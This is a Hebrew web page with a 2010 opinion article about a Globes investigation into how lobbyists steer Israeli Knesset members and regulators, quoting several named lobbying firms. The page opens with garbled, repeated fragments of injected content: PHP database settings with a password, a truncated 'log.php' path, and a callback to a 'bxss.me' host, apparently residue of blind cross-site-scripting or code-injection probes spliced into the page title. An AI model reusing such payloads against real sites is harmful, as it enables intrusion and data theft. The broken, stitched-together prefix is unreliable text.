$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> לפי תחקיר גלובס: לוביסטים מנהלים את המדינה ואת חברי הכנסת
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

לוביסטים מנהלים את המדינה ואת חברי הכנסת

תאריך: 12/09/2010 16:32   מחבר: מערכת האתר

חברי כנסת ולוביסטים

מה עוד נותר לספר על חברי הכנסת שלא סופר. שהם בטלנים. שהם לא שווים את השכר שאנו משלמים להם. יש ביניהם כמה חרוצים, יעילים ומסורים לתפקידם ולשליחותם הציבורית. מרביתם, רודפי כותרות ופרסום.במבחן העשייה הם נכשלים ובגדול. לאחר בחירתם ולאחר מסע ליקוקים לבוחר הפוטנציאלי הם נעלמים ומאבדים קשר עם האזרח ועם המשימות שהוטלו עליו. 

האמירה הידועה והעוקצנית שהכנסת זה המקום הכי קר בעולם. מד המעלות מראה תמיד על "120 מתחת לאפס". והנה, השבוע אנו נחשפים לתחקיר מיוחד שערך העיתון "גלובס" במסגרתו חשף את מעורבותם העמוקה של הלוביסטים המפעילים כמריונטות חלק מחברי הכנסת.

ממצאי התחקיר רק מחזקים ומאששים את התדמית הירודה שהודבקה לחברי הכנסת. למה לעבוד קשה. המשכורת דופקת כל חודש. יש רכב צמוד. יש תקציב לקשר עם הציבור. יש תקשורת שאפשר לנצל אותה לרומם את פועלו. מהתחקיר למדנו את מה שידענו תמיד, שחבר הכנסת מופעל על ידי לוביסט שנשלח במצוות אדונו, בעל ההון והאינטרסים כדי שזה ישכנע את חבר הכנסת להצביע עבורו בוועדות הכנסת הרלבנטיות לעניינו.  הלוביסט מנסח לחבר הכנסת מכתבים, מכין לו חומר רקע ומציג לו את מפת השחקנים בזירה בו הוא פעיל.

לוביזם מוצלח, יביא לקבלת החלטה העולה בקנה אחד עם המעסיק של הלוביסט. אחד יגזור קופון כספי ואילו הח"כ, יקבל את מנת הפרסום בתקשורת שלה הוא זקוק, שם יוצג כמי שעבד קשה מאד על הצעת החוק והעברתו במליאה בעוד שבפועל, הוא נכח בכמה ישיבות והצביע כפי שהלוביסט שכנע אותו להצביע.

ומכאן, לכמה דוגמאות שעלו במסגרת התחקיר. כתב של העיתון, התחזה ליזם העוסק במיחזור מים אפורים. הבחירה לא הייתה מקרית וסתמית. לאחרונה, עבר בכנסת בקריאה טרומית חוק המתיר שימוש במערכות מסוג זה, והיזם הסביר שרצונו לקחת צעד קדימה: לגרום למדינה להעניק לאזרחים ולמוסדות תמריצים לרכישת המערכות - בנימוק של חיסכון במים.  עם כזה סיפור כיסוי יצא הכתב לצוד את הלוביסטים המובילים כדי לבחון את פעילותם והישגיהם.

אביגדור יצחקי – מנכ"ל המשרד "גורן עמיר".

משרד גורן עמיר הוא אחד הגדולים בענף הלוביסטים. יצחקי מונה כמנכ"ל בתחילת 2010. בעבר כיהן כמנכ"ל משרד ראש הממשלה אריאל שרון, כחבר כנסת וכיו"ר הקואליציה.  בתפקידו הנוכחי הוא מטפל בתחומים בהם עסק בתפקידו הציבורי כמו, גז טבעי וענייני תעופה. פעם המדינה הייתה הלקוח שלו, וכיום הלקוח שלו הוא בעל ההון והאינטרסים.

בפגישה עם הכתב הסביר יצחקי שיריעת הפעילות של המשרד רחבה. המשרד עובד מול הממשלה בדרג הפוליטי והמקצועי שלה. "אנחנו יוזמים החלטות, משנים החלטות, אנו עוסקים בצווים, בנהלים ובכל מה שקשור במערכת הממשל מול האזרחים", הוסיף. להמחשת הנטען על ידו הביא יצחקי את הדוגמה של יצחק תשובה. לדבריו, כעולה מהתחקיר, הוא פועל בקרב רשות ההגבלים העסקיים.

כדי להוכיח שאין בעיה של בעוצמתו העסקית של תשובה. " אנחנו עושים את כל הווייה דלורוזה של רשות הגז, רשות החשמל, מינהל החשמל, רשות ההגבלים העסקיים, מנכ"ל משרד התשתיות, שר התשתיות והכנסת. אנחנו כל הזמן עם היד על הדופק - מפגישים את הלקוח עם מי שצריך, ועוזרים לו בעריכת המסרים ובחידודם", חידד יצחקי את טיעוניו כל זאת כדי שהכתב היזם, ירכוש את שירותיו כלוביסט.

לפני כחודש ועדת הכלכלה של הכנסת דנה בתקנות שהגדירו אילו מוצרים יוכלו צרכנים להשיב, ולקבל תמורתם החזר כספי מלא. בתקנות המקוריות שהגיש משרד התמ"ת נכללו טיסות לחו"ל, אולם בדיונים הוחלט להוציאן מהרשימה, ולבחון את הנושא בהמשך. איך זה קרה ? הלוביסטית שובכר ממשרד גורן עמיר הסבירה את שיטת הביצוע שגרמה לשינוי לטובת האינטרסים של משפחת בורוביץ' בעלי השליטה בחברת אל על." יש לנו קשרים עם המשרדים הרלבנטיים, שכאן היו התמ"ת והתיירות. מארגנים ללקוח פגישה בין השרים, בין מנכ"לי המשרדים, מגייסים ח"כים ומפעילים אותם בהצבעה"

משרד "תקשורת פלוס"

רותי פרמינגר, אחד הבעלים של משרד "תקשורת פלוס" הסבירה לכתב העיתון "גלובס" כי הלובינג מגיע עד ללשכותיהם של יהודה ויינשטיין, זוהר גושן וסטנלי פישר, או לפחות לאנשיהם. לטענתה,  אי אפשר לעבוד רק מול הכנסת. חייבים לעבוד מול הממשלה ומול מי שצריך בין קובעי המדיניות כמו: בנק ישראל, רשות ההגבלים, רשות ניירות ערך, היועץ המשפטי לממשלה. "אני הולכת לכל מקום" הצהירה פרמינגר והוסיפה "כשאני באה לרשות ההגבלים, אני באה כיועצת אסטרטגית.

בסוגיית מכירת תרופות יקרות ייצגה את איגוד חברות התרופות הבינלאומיות בארץ ולצורך כך נפגשה עם מי שצריך במשרדי האוצר והבריאות. "  היינו בצנטרום של קביעת מחירים יחד עם משרד הבריאות ועם משרד האוצר, בישיבות עד הלילה. הייתי שם, ואני לא מתביישת בזה". סיפרה לתחקירן.

הלוביסטית קרן ברק אמרה לכתב העיתון כי בכנסת עצמה היא יודעת לבנות מהלכים שמנטרלים למשל את הממונה על ההגבלים העסקיים. להבהרת עמדתה מסרה: " אני בונה את הטיעונים לח"כים שמנטרלים אותה: 'הממונה תגיד ככה וככה, אבל התשובה לזה היא ככה וככה'".

משרד כהן רימון כהן

בפגישה עם הנהלת המשרד הציג הכתב בקשה לקידום חקיקה שיכולה להקטין את הריכוזיות בשוק הגז למשקי בית וכך יתאפשר לו כיזם לחדור לשוק הגז. לפי השיטה של הלוביסטים, ח"כ מש"ס אמנון כהן שהיה יו"ר ועדת הכלכלה הופעל לטובת העניין. הוא גייס תמיכה של חבריו הנוספים בוועדה יחד עם שני נציגים בוועדת שרים לענייני כלכלה. "עשיתי משהו שהוא עדיין סודי", התפארה גב' דפנה כהן וסיפרה עוד לכתב: " קיבלתי תמיכה ממשלתית בלקוח שלי שמתחרה מול גורם מונופוליסטי גדול. המנכ"ל של אותו גורם התקשר לאמנון כהן והסביר לו למה הוא יפטר עובדים אם החקיקה תעבור - ולמרות זאת הממשלה תמכה בזה. זה לא היה טריוויאלי. אמנון חזק".

חברי כנסת מופעלים על ידי הלוביסטים

רוב הלוביסטים עבדו פעם במערכת הפוליטית. הם מכירים אותה מבפנים ואת הנפשות הפועלות בה על חולשותיה ויתרונותיה. שרון בלומברג ממשרד קליינר הסביר לכתב העיתון כי המטרה של חבר הכנסת הי לתפוס גל על נושאים מעניינים ולקדם אותם.

למרות העובדה שבכנסת פועל מרכז מחקר שאמור לספק לפוליטיקאים מידע וניתוחים אובייקטיביים לא נראה שהחברים משקיעים מאמץ ועושים בו שימוש. הם מעדיפים את המידע שמספק הלוביסט. ועל כך מספר בלומברג: " אני מביא לח"כ חומר שכבר מעובד, והח"כ לא צריך להתחיל להתרוצץ ולעשות מחקרים...."  בהמשך מספר בלומברג כי הוא מנסח מכתבים לחברי כנסת ושרים ואף למעלה מזה." זה לא נובע משחיתות ולא מרדידות, אלא מהיכרות רבת שנים, עמוקה, של מה היכולות של כל אחד, מה הוא רוצה, מי סומך על מי".

לדברי בלומברג כפי שנמסרו לכתב עם לא מעט קורטוב של יוהרה, יש להם קשר מצוין עם חכ"י ם צעירים שמכירים אותם ומוקירים את עבודתם. "מה שהם לא ילמדו אנחנו כבר שכחנו". סיפר והוסיף כי הצעות שדוחפים לוביסטים זוכות להרבה יותר הצלחה מאלו שמעלים חברי הכנסת. הזמן והמשאבים של חבר כנסת מוגבלים. " אני בחמש דקות סוגר עניינים במסדרון או בטלפון", התפאר מר בלומברג.

לסיכום- אין לנו טענות וביקורת כלפי הלוביסטים. הם עושים עבודתם תמורת שכר. פעם קראו להם מאכערים. היום זה לוביסט. הטענה שלנו כנגד חברי הכנסת שיש להם אגף מחקר עצמאי בכנסת, יש להם עוזרים פרלמנטריים שמקבלים שכר מאיתנו הציבור. והם עצמם באו לכנסת כדי לעבוד עבור שולחיהם ובוחריהם. מתברר שחלק ניכר מעבודתם עושים הלוביסטים וכך מוצג הח"כ כבטלן וחסר חוט שדרה. זה כשר אבל מריח רע ונראה עוד יותר רע בעיני הציבור.

תגיות בעמוד:   לוביסט    חבר כנסת    כהן רימון    גורן עמיר    כנסת    ממשלה    ועדת כנסת